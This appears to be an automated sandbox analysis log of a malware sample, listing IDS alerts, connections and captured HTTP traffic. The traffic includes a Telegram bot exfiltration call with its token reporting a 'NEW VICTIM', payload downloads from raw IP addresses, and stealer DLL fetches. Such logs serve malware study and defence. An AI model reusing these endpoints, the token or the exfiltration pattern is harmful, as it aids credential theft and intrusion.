Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50636 -> 104.21.89.115:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50622 -> 104.21.89.115:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50639 -> 104.21.89.115:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50618 -> 104.21.89.115:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50624 -> 104.21.89.115:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50633 -> 104.21.89.115:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50616 -> 104.21.89.115:443

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0085E0C0 recv,recv,recv,recv,

0_2_0085E0C0

Source: global traffic	HTTP traffic detected: GET /uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1User-Agent: FileDownloaderHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1User-Agent: FileDownloaderHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1User-Agent: FileDownloaderCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1User-Agent: FileDownloaderCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json HTTP/1.1User-Agent: IPInfoFetcherHost: ipinfo.ioCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=7427009775&text=%3Cb%3E%F0%9F%94%94NEW%20VICTIM%20%2D%20Extensions%20Installed%3C%2Fb%3E%0A%3Cb%3EIP%20Address%3A%3C%2Fb%3E%208%2E46%2E123%2E189%0A%3Cb%3EDevice%20Name%3A%3C%2Fb%3E%20715575%0A%3Cb%3ELocation%3A%3C%2Fb%3E%20New%20York%20City%2C%20New%20York%2C%20US%0A%3Cb%3EWallets%3A%3C%2Fb%3E%0A%3Ccode%3ENothing%20found%3C%2Fcode%3E&parse_mode=HTML HTTP/1.1User-Agent: TelegramBotHost: api.telegram.orgCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /json HTTP/1.1User-Agent: IPInfoFetcherHost: ipinfo.ioCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: /
Source: global traffic	HTTP traffic detected: GET /bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=7427009775&text=%3Cb%3E%F0%9F%94%94NEW%20VICTIM%20%2D%20Extensions%20Installed%3C%2Fb%3E%0A%3Cb%3EIP%20Address%3A%3C%2Fb%3E%208%2E46%2E123%2E189%0A%3Cb%3EDevice%20Name%3A%3C%2Fb%3E%20715575%0A%3Cb%3ELocation%3A%3C%2Fb%3E%20New%20York%20City%2C%20New%20York%2C%20US%0A%3Cb%3EWallets%3A%3C%2Fb%3E%0A%3Ccode%3ENothing%20found%3C%2Fcode%3E&parse_mode=HTML HTTP/1.1User-Agent: TelegramBotHost: api.telegram.orgCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKDhygE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKDhygE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2,es_dfp:72fefd38 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/ddllog?async=doodle:306735258,slot:22,type:1,cta:0 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /json HTTP/1.1User-Agent: IPInfoFetcherHost: ipinfo.ioCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=7427009775&text=%3Cb%3E%F0%9F%94%94NEW%20VICTIM%20%2D%20Extensions%20Installed%3C%2Fb%3E%0A%3Cb%3EIP%20Address%3A%3C%2Fb%3E%208%2E46%2E123%2E189%0A%3Cb%3EDevice%20Name%3A%3C%2Fb%3E%20715575%0A%3Cb%3ELocation%3A%3C%2Fb%3E%20New%20York%20City%2C%20New%20York%2C%20US%0A%3Cb%3EWallets%3A%3C%2Fb%3E%0A%3Ccode%3ENothing%20found%3C%2Fcode%3E&parse_mode=HTML HTTP/1.1User-Agent: TelegramBotHost: api.telegram.orgCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/Krokodyl02/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /files/geopoxid/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /files/zhigarko/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /files/kardanvalov88/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /files/martin/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /files/unique1/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /niCGMfnfOxUBXxpLhBBB1734796753?argument=sqcim1nDAay1ts2z1734830229 HTTP/1.1Host: home.fivetk5sb.topAccept: /
Source: global traffic	HTTP traffic detected: GET /files/burpin1/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dll/key HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dll/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache

Source: cc6f25572f.exe, 00000011.00000003.2765856821.000001D6698F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 4-1b5020b1c2a0"},"nmmhkkegccagdldgiimedpiccmgmieda":{"cohort":"1::","cohortname":"","dlrc":6120,"installdate":6120,"pf":"dcb37f49-aa68-4ebc-a8d4-14eaa556e331"}}},"web_app":{"app_id":{"install_url":{"aghbiahbpaijignceidepookljebhfak":["https://drive.google.com/drive/installwebapp?usp=chrome_default"],"agimnkijcaahngcdmfeangaknmldooml":["https://www.youtube.com/s/notifications/manifest/cr_install.html"],"fhihpiojkbmbpdjeoajapmgkhlnakfjf":["https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default"],"fmgjjmmmlfnkbppncabfkddbjimcfncm":["https://mail.google.com/mail/installwebapp?usp=chrome_default"],"kefjledonklijopmnomlcbpllchaibag":["https://docs.google.com/presentation/installwebapp?usp=chrome_default"],"mpnpojknpmmopombnjdcgaaiekajbnjb":["https://docs.google.com/document/installwebapp?usp=chrome_default"]}}},"web_apps":{"did_migrate_default_chrome_apps":["MigrateDefaultChromeAppToWebAppsGSuite","MigrateDefaultChromeAppToWebAppsNonGSuite"],"last_preinstall_synchronize_version":"117","migrated_default_apps":["aohghmighlieiainnegkcijnfilokake","aapocclcgogkmnckokdopfmhonfmgoek","felcaaldnbdncclmgdcncolpebgiejap","apdfllckaahabafndbhieahigkjlhalf","pjkljhegncpnkpknbcohdijeoejaedia","blpcfgokakmgnkcojhhkbfbldkacnbeo"]},"zerosuggest":{"cachedresults":")]}'\n[\"\",[\"one piece chapter 1094 spoilers twitter\",\"baltimore drinking water parasites\",\"assassin creed mirage release\",\"rwd tesla model y\",\"michigan hockey johnny druskinis\",\"loki season 2 jonathan majors\",\"google pixel 8 pro leaks\",\"amazon prime deals prime day\"],[\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[],{\"google:clientdata\":{\"bpc\":false,\"tlw\":false},\"google:groupsinfo\":\"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\\u003d\",\"google:suggestdetail\":[{\"zl\":10002},{\"zl\":10002},{\"zl\":10002},{\"zl\":10002},{\"zl\":10002},{\"zl\":10002},{\"zl\":10002},{\"zl\":10002}],\"google:suggestrelevance\":[1257,1256,1255,1254,1253,1252,1251,1250],\"google:suggestsubtypes\":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],\"google:suggesttype\":[\"QUERY\",\"QUERY\",\"QUERY\",\"QUERY\",\"QUERY\",\"QUERY\",\"QUERY\",\"QUERY\"]}]"}} equals www.youtube.com (Youtube)
Source: cc6f25572f.exe, 00000011.00000003.2765856821.000001D6698F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: da":{"cohort":"1::","cohortname":"","dlrc":6120,"installdate":6120,"pf":"dcb37f49-aa68-4ebc-a8d4-14eaa556e331"}}},"web_app":{"app_id":{"install_url":{"aghbiahbpaijignceidepookljebhfak":["https://drive.google.com/drive/installwebapp?usp=chrome_default"],"agimnkijcaahngcdmfeangaknmldooml":["https://www.youtube.com/s/notifications/manifest/cr_install.html"],"fhihpiojkbmbpdjeoajapmgkhlnakfjf":["https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default"],"fmgjjmmmlfnkbppncabfkddbjimcfncm":["https://mail.google.com/mail/installwebapp?usp=chrome_default"],"kefjledonklijopmnomlcbpllchaibag":["https://docs.google.com/presentation/installwebapp?usp=chrome_default"],"mpnpojknpmmopombnjdcgaaiekajbnjb":["https://docs.google.com/document/installwebapp?usp=chrome_default"]}}},"web_apps":{"did_migrate_default_chrome_apps":["MigrateDefaultChromeAppToWebAppsGSuite","MigrateDefaultChromeAppToWebAppsNonGSuite"],"last_preinstall_synchronize_version":"117","migrated_default_apps":["aohghmighlieiainnegkcijnfilokake","aapocclcgogkmnckokdopfmhonfmgoek","felcaaldnbdncclmgdcncolpebgiejap","apdfllckaahabafndbhieahigkjlhalf","pjkljhegncpnkpknbcohdijeoejaedia","blpcfgokakmgnkcojhhkbfbldkacnbeo"]},"zerosuggest":{"cachedresults":")]}'\n[\"\",[\"one piece chapter 1094 spoilers twitter\",\"baltimore drinking water parasites\",\"assassin creed mirage release\",\"rwd tesla model y\",\"michigan hockey johnny druskinis\",\"loki season 2 jonathan majors\",\"google pixel 8 pro leaks\",\"amazon prime deals prime 